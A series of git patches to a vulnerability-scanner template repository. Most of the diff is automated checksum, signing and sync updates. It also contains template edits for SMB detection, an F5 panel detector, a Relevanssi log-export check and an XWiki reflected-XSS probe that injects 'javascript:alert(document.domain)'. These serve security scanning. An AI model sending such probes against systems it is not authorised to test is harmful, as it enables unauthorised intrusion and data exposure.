dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3261,7 +3261,7 @@ http/cves/2024/CVE-2024-1208.yaml:a64398099908496a14705ee1ea9a82ef498f471e http/cves/2024/CVE-2024-1209.yaml:83acee361fad278c37690439c442a8deef01cd3c http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe -http/cves/2024/CVE-2024-1380.yaml:44cadd112c6f179322c827ee6a1fd8882418a0a4 +http/cves/2024/CVE-2024-1380.yaml:a770ea114a4b5f8a438bd22e1acb5e964eff990f http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:3978d9abbcba91bb6b6fe4cf6130cc35695bd1b8 @@ -7029,7 +7029,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:88a4087e262947836d1f890569453b5f27c17cc8 +http/technologies/tech-detect.yaml:c32c27072a4c6a6b793577ea2fea9b820c8caef9 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8423,6 +8423,7 @@ javascript/enumeration/pgsql/pgsql-version-detect.yaml:8df6f8316bef70e0496120454 javascript/enumeration/pop3/pop3-capabilities-enum.yaml:d0cf0a8cbf8eebbfb609b3b4a114cbce3477cf53 javascript/enumeration/redis/redis-info.yaml:17197baa18471c8ed3443433bea5413de8abca80 javascript/enumeration/redis/redis-require-auth.yaml:2e6d7543ead7418aa8a7cf9c07d1ea0fb4eaa0ea +javascript/enumeration/rsync/rsync-list-modules.yaml:ba4e837928267d3aecf7c115a6a2e6bf8bdc443b javascript/enumeration/rsync/rsync-version.yaml:30403f8400ce626131ddb8ff2d5091e9ef10184b javascript/enumeration/smb/smb-default-creds.yaml:957329540c766e1c512fc9c449aa5fac038283c3 javascript/enumeration/smb/smb-enum-domains.yaml:2589732d61916fe1466772e4e770d3acb08f98e2 @@ -8629,7 +8630,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a7ba8f07f5d0a8cf90eef9e1f5390b27416523f9 +templates-checksum.txt:a96a07e49e129e7e330b850387b088b79247ad38 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 314bf5b26b5f09d55eae4b44143f74ec3b96373d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 08:20:35 +0000 Subject: [PATCH 698/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0a94ae4d07..1a5de264e7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -73,6 +73,7 @@ on: - 'http/vulnerabilities/other/cerio-dt-rce.yaml' - 'http/vulnerabilities/other/easycvr-info-leak.yaml' - 'javascript/backdoor/proftpd-backdoor.yaml' + - 'javascript/enumeration/rsync/rsync-list-modules.yaml' - 'network/detection/bitvise-ssh-detect.yaml' - 'passive/cves/2024/CVE-2024-25723.yaml' workflow_dispatch: From 012df789b9a69e131a3dc8a2963f1309eafd0597 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:21:39 +0000 Subject: [PATCH 699/847] Auto Template Signing [Wed Jun 5 08:21:39 UTC 2024] :robot: --- javascript/enumeration/rsync/rsync-list-modules.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/javascript/enumeration/rsync/rsync-list-modules.yaml b/javascript/enumeration/rsync/rsync-list-modules.yaml index a28adb1228..c7f1f4e9c3 100644 --- a/javascript/enumeration/rsync/rsync-list-modules.yaml +++ b/javascript/enumeration/rsync/rsync-list-modules.yaml @@ -46,3 +46,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100c713729308a8f7b0672cd8f4b1c90a8a944726395fc434786484756a0a14da2002201ccba47b6c8e53348fe727b9543cdfe9df88a1ee7b20daa90e6a0b91a093ccde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3f2da464e4c031d5f9d4246ee01f02f139837487 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 13:59:41 +0530 Subject: [PATCH 700/847] delete - samba --- network/detection/samba-detect.yaml | 35 ----------------------------- 1 file changed, 35 deletions(-) delete mode 100644 network/detection/samba-detect.yaml diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml deleted file mode 100644 index c830550edc..0000000000 --- a/network/detection/samba-detect.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: samba-detect - -info: - name: Samba Service Detection - author: pussycat0x - severity: info - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. - reference: - - https://www.samba.org/samba/what_is_samba.html - - https://www.samba.org/samba/history/security.html - remediation: Always apply the latest security patch. - classification: - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: network,smb,samba,detect - -tcp: - - inputs: - - data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200 - type: hex - host: - - "{{Hostname}}" - port: 139 - matchers-condition: and - matchers: - - type: word - words: - - "SMBr" - - - type: word - words: - - "HTTP/1.1" - negative: true -# digest: 490a0046304402205c153fbf52a7b2dfadb408469629086b32e13a3223444116b3e82f4d762044d2022007d379537a766d3cd6913722a0ef27530f0b94fe88229c24efb1786afd25b1fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dfd5ec5d541da8db5f487dae7ec6058ef4be5efb Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 08:39:27 +0000 Subject: [PATCH 701/847] Auto Generated New Template Addition List [Wed Jun 5 08:39:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e808f6e0c2..62562f5e01 100644 --- a/.new-additions +++ b/.new-additions @@ -68,6 +68,7 @@ http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml http/vulnerabilities/other/easycvr-info-leak.yaml javascript/backdoor/proftpd-backdoor.yaml +javascript/detection/samba-detect.yaml javascript/enumeration/rsync/rsync-list-modules.yaml network/detection/bitvise-ssh-detect.yaml passive/cves/2024/CVE-2024-25723.yaml From a159f6c5385e2a725174f2ddd0dc16f23ea1664f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:39:35 +0000 Subject: [PATCH 702/847] Auto Generated Templates Checksum [Wed Jun 5 08:39:35 UTC 2024] :robot: --- templates-checksum.txt | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ad6d873402..a203384387 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8406,6 +8406,7 @@ javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab807 javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff +javascript/detection/samba-detect.yaml:2cbf9c5519e7138645e6dd6cc9f7a1229ead263b javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df javascript/enumeration/minecraft-enum.yaml:b479fd24c897f43fa8931185c0dd0b03e4a57c5a @@ -8423,7 +8424,7 @@ javascript/enumeration/pgsql/pgsql-version-detect.yaml:8df6f8316bef70e0496120454 javascript/enumeration/pop3/pop3-capabilities-enum.yaml:d0cf0a8cbf8eebbfb609b3b4a114cbce3477cf53 javascript/enumeration/redis/redis-info.yaml:17197baa18471c8ed3443433bea5413de8abca80 javascript/enumeration/redis/redis-require-auth.yaml:2e6d7543ead7418aa8a7cf9c07d1ea0fb4eaa0ea -javascript/enumeration/rsync/rsync-list-modules.yaml:ba4e837928267d3aecf7c115a6a2e6bf8bdc443b +javascript/enumeration/rsync/rsync-list-modules.yaml:9352a721c51e41d8650c838e52b2a127f7f254ce javascript/enumeration/rsync/rsync-version.yaml:30403f8400ce626131ddb8ff2d5091e9ef10184b javascript/enumeration/smb/smb-default-creds.yaml:957329540c766e1c512fc9c449aa5fac038283c3 javascript/enumeration/smb/smb-enum-domains.yaml:2589732d61916fe1466772e4e770d3acb08f98e2 @@ -8515,9 +8516,7 @@ network/detection/riak-detect.yaml:52227798c47f3827b0655dd0c823ec6bca263b5e network/detection/rpcbind-portmapper-detect.yaml:80b9d8e77ae5a12be69f8149b55184ba3596719d network/detection/rsyncd-service-detect.yaml:d38481e49f7dd473003dd91741e2d0eb26bee36d network/detection/rtsp-detect.yaml:d6b839083a1d1a39445f6cde00325e4467153ae6 -network/detection/samba-detect.yaml:4c98619a9d742894136cc722e2571ab9338c18e0 network/detection/sap-router.yaml:3cdb63aecfb328ce98b6bf81bbc5de6e61d70526 -network/detection/smb-detect.yaml:dca4a7005c959c0a407f6413b3e89638c485ff13 network/detection/smtp-detect.yaml:5fa2e7cef1d9aec1de4c88d093d974c897f4dc9d network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6911f network/detection/starttls-mail-detect.yaml:5d06e17119e499ff79a593821eae44d928007c69 @@ -8630,7 +8629,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a96a07e49e129e7e330b850387b088b79247ad38 +templates-checksum.txt:eb58b979935c6f360421c10f0274b0557a1e7459 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f459a987d1e17b3be21d00ed4214596383664b51 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 08:40:09 +0000 Subject: [PATCH 703/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1a5de264e7..a50e28f557 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -73,6 +73,7 @@ on: - 'http/vulnerabilities/other/cerio-dt-rce.yaml' - 'http/vulnerabilities/other/easycvr-info-leak.yaml' - 'javascript/backdoor/proftpd-backdoor.yaml' + - 'javascript/detection/samba-detect.yaml' - 'javascript/enumeration/rsync/rsync-list-modules.yaml' - 'network/detection/bitvise-ssh-detect.yaml' - 'passive/cves/2024/CVE-2024-25723.yaml' From d0207712ce205b4d8c04773b5c1a899acb362f85 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:41:12 +0000 Subject: [PATCH 704/847] Auto Template Signing [Wed Jun 5 08:41:12 UTC 2024] :robot: --- javascript/detection/samba-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/javascript/detection/samba-detect.yaml b/javascript/detection/samba-detect.yaml index cc3803783f..ddde28229d 100644 --- a/javascript/detection/samba-detect.yaml +++ b/javascript/detection/samba-detect.yaml @@ -38,4 +38,5 @@ javascript: extractors: - type: dsl dsl: - - response \ No newline at end of file + - response +# digest: 4a0a00473045022075bb33d020faf12b0f09d059349670e69c7268ee6bd5f24e19797c085037e173022100f9b2e1034ee0ebc76c769ca014476f0ba06f6ff0c86e43d3e09e1b7bd0291c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 64672ea3f9ccb6beefc3c4440e720dc4263a9f89 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 22:23:32 +0530 Subject: [PATCH 705/847] Update CVE-2024-1380.yaml --- http/cves/2024/CVE-2024-1380.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index eec639a063..52c582f961 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -6,7 +6,6 @@ info: severity: medium description: | The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. - remediation: Fixed in 4.22.1 reference: - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve @@ -37,5 +36,6 @@ http: dsl: - 'status_code == 200' - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' + - '!contains(body, "No search keywords logged")' + - '!content_length == 0' condition: and -# digest: 490a0046304402201272337c67a76b0203bc4aa653c317274fe8d6ad7253b664b827e1212dcc356202203920d9d81cf38c7d9c21315f113b82e9fdea0ff67cd19a6b5abf232ae55b2dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8f73d0722aa84f1b6d955f37fd5bcbc3294a5330 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 23:16:32 +0530 Subject: [PATCH 706/847] Update CVE-2024-1380.yaml --- http/cves/2024/CVE-2024-1380.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 52c582f961..3a2581d084 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -6,6 +6,7 @@ info: severity: medium description: | The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. + remediation: Fixed in 4.22.1 reference: - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve From e77e7f315a32968524da022a8bed4aecfc7afd7e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 23:44:03 +0530 Subject: [PATCH 707/847] final update --- http/cves/2024/CVE-2024-1380.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 3a2581d084..5ba940d21b 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -37,6 +37,5 @@ http: dsl: - 'status_code == 200' - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' - - '!contains(body, "No search keywords logged")' - - '!content_length == 0' + - 'contains_all(body, "user_id", "session_id")' condition: and From 87ca6c08240633321b8dfefc4dadfa321363e8bf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 18:27:07 +0000 Subject: [PATCH 709/847] Auto Template Signing [Wed Jun 5 18:27:07 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1380.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 5ba940d21b..5b0fc54e84 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -39,3 +39,4 @@ http: - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' - 'contains_all(body, "user_id", "session_id")' condition: and +# digest: 4a0a00473045022100fdca94211d49feac7affb79d5d4723404f97a0eec77a19696bfa855f008e7dd1022072ff0b48f53ad24ed15f081f510ce1875c489798ee413e581239d13760f79e45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 41fab95a685310f022f831f060514f222f778217 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 6 Jun 2024 15:08:44 +0530 Subject: [PATCH 710/847] updated FN matcher & metadata --- http/exposed-panels/f5-admin-interface.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml index abe15f36d8..d2039b6d73 100644 --- a/http/exposed-panels/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -3,9 +3,13 @@ id: f5-admin-interface info: name: F5 Admin Interface - Detect author: drewvravick - severity: high + severity: info description: | Detects F5 Admin Interfaces. + metadata: + max-request: 1 + verified: true + shodan-query: html:"BIG-IP Configuration Utility" tags: f5,admin,detect,panel,login http: @@ -21,7 +25,7 @@ http: - type: word part: body words: - - 'BIG-IP Configuration Utility' + - 'Configuration Utility' - 'F5 Networks' condition: and From fd0c18af1b15f1de73c967d252a070ee9c5b6c05 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 6 Jun 2024 09:44:26 +0000 Subject: [PATCH 711/847] Auto Generated New Template Addition List [Thu Jun 6 09:44:26 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 62562f5e01..040496d23a 100644 --- a/.new-additions +++ b/.new-additions @@ -22,6 +22,7 @@ http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/cox-business-panel.yaml http/exposed-panels/digital-watchdog-panel.yaml +http/exposed-panels/f5-admin-interface.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/oracle-access-management.yaml http/exposed-panels/oracle-peoplesoft-panel.yaml From b710451405819ae750d7fccac93091d5c3508f94 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 6 Jun 2024 09:44:31 +0000 Subject: [PATCH 712/847] Auto Generated Templates Checksum [Thu Jun 6 09:44:31 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a203384387..08f6131c0d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3261,7 +3261,7 @@ http/cves/2024/CVE-2024-1208.yaml:a64398099908496a14705ee1ea9a82ef498f471e http/cves/2024/CVE-2024-1209.yaml:83acee361fad278c37690439c442a8deef01cd3c http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe -http/cves/2024/CVE-2024-1380.yaml:a770ea114a4b5f8a438bd22e1acb5e964eff990f +http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:3978d9abbcba91bb6b6fe4cf6130cc35695bd1b8 @@ -3829,6 +3829,7 @@ http/exposed-panels/extreme-netconfig-ui.yaml:c99540335fbd14e8a832200372e67e9f8a http/exposed-panels/extron-cms-panel.yaml:d8f4a5abd2e42f9b07e08f0ee95b2f6481803613 http/exposed-panels/ez-publish-panel.yaml:5160341394610803f417b5d8fda27da090e4d214 http/exposed-panels/f-secure-policy-manager.yaml:646c92e4390397cc7bf80e8bcd992a1043a95f6f +http/exposed-panels/f5-admin-interface.yaml:a64225dc87a41c6a3704338f1d1abbc28e2ef6df http/exposed-panels/faraday-login.yaml:c3b48df43eb116d0c1e264a181ca095685ef0e0b http/exposed-panels/fastapi-docs.yaml:74f9efd92e158f5b36c17eb1e45668c5fb0dafee http/exposed-panels/fastpanel-hosting-control-panel.yaml:c53b1d9ac66491f5b7e535f52111e85da99734c1 @@ -8406,7 +8407,7 @@ javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab807 javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff -javascript/detection/samba-detect.yaml:2cbf9c5519e7138645e6dd6cc9f7a1229ead263b +javascript/detection/samba-detect.yaml:b72dfe69d115b83bf8b9835e5ce44001638babdb javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df javascript/enumeration/minecraft-enum.yaml:b479fd24c897f43fa8931185c0dd0b03e4a57c5a @@ -8629,7 +8630,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eb58b979935c6f360421c10f0274b0557a1e7459 +templates-checksum.txt:cb9993c4367096c439fe888572cd737763f5acda wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 589adc1ca07402ab849c0d2de083f05c46217c47 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 6 Jun 2024 09:45:17 +0000 Subject: [PATCH 713/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a50e28f557..e1faa96144 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -27,6 +27,7 @@ on: - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/cox-business-panel.yaml' - 'http/exposed-panels/digital-watchdog-panel.yaml' + - 'http/exposed-panels/f5-admin-interface.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/oracle-access-management.yaml' - 'http/exposed-panels/oracle-peoplesoft-panel.yaml' From 5daab66ae67f05d5262ace283c7f06128b4f3f25 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 6 Jun 2024 09:46:21 +0000 Subject: [PATCH 714/847] Auto Template Signing [Thu Jun 6 09:46:21 UTC 2024] :robot: --- http/exposed-panels/f5-admin-interface.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml index d2039b6d73..9a465fae78 100644 --- a/http/exposed-panels/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022011b681f583143ee1940d5b356baedc9a52d3501d679c1f432810c574f3de8f4b0220157c5ef2f2c8d7870e0587aaaf63e402c19e559703d2e80e98e4fcb69a92dcd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0068d262a659e095626423967940ff520b42d55c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 6 Jun 2024 15:29:33 +0530 Subject: [PATCH 715/847] Create CVE-2023-35162.yaml --- http/cves/2023/CVE-2023-35162.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35162.yaml diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml new file mode 100644 index 0000000000..ae401369d8 --- /dev/null +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-35162 + +info: + name: XWiki < 14.10.5 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter. + impact: | + Successful exploitation could lead to unauthorized access or data theft. + remediation: | + Apply the latest patches provided by XWiki to mitigate the vulnerability. + reference: + - https://jira.xwiki.org/browse/XWIKI-20342 + - https://github.com/xwiki/xwiki-platform/blob/244dbbaa0738a0c40b19929c0369c8b62ae5236e/xwiki-platform-core/xwiki-platform-flamingo/xwiki-platform-flamingo-skin/xwiki-platform-flamingo-skin-resources/src/main/resources/flamingo/previewactions.vm#L48 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35162 + cwe-id: CWE-79 + epss-score: 0.00127 + epss-percentile: 0.46778 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + vendor: xwiki + product: xwiki + shodan-query: "XWiki" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)" + + matchers: + - type: dsl + dsl: + - 'contains(body, "name=\"xcontinue\" value=\"javascript:alert(document.domain)")' + - 'contains(body, "Back To Edit")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From 81019b2c8f18d20178a8c65d5af8e476ed041b2b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 6 Jun 2024 15:39:15 +0530 Subject: [PATCH 716/847] FN matcher fix --- http/cves/2023/CVE-2023-35162.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml index ae401369d8..f48f524f2f 100644 --- a/http/cves/2023/CVE-2023-35162.yaml +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -38,7 +38,7 @@ http: - type: dsl dsl: - 'contains(body, "name=\"xcontinue\" value=\"javascript:alert(document.domain)")' - - 'contains(body, "Back To Edit")' + - 'contains(body, "previewactions.vm")' - 'contains(header, "text/html")' - 'status_code == 200' condition: and From 12ee0add7e40663f975eaaca80c7dbb936547ed9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 6 Jun 2024 12:50:05 +0000 Subject: [PATCH 717/847] Auto Generated New Template Addition List [Thu Jun 6 12:50:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 040496d23a..0f2cebfdd0 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-3077.yaml +http/cves/2023/CVE-2023-35162.yaml 